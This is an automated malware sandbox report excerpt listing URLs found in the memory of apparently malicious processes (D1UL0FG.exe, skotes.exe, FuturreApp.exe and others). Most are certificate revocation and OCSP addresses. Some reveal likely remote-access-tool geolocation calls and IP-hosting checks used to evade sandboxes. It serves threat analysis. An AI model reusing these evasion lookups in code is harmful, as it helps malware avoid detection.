                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                                Source: D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                Source: D1UL0FG.exe, 00000006.00000003.2479810118.000001FA2E00B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                                Source: FuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp.
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp?_8
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspM
                                Source: FuturreApp.exe, 00000055.00000002.7280001721.000000000102A000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000003.4653304717.000000000102A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSO#v
                                Source: FuturreApp.exe, 00000055.00000002.7278981622.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspS_T
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: FuturreApp.exe, 00000055.00000003.4653304717.0000000001011000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E324000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2491071209.000001FA2E339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr=
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr=r
                                Source: powershell.exe, 00000011.00000002.2798190076.0000028A95663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA472A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA45E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
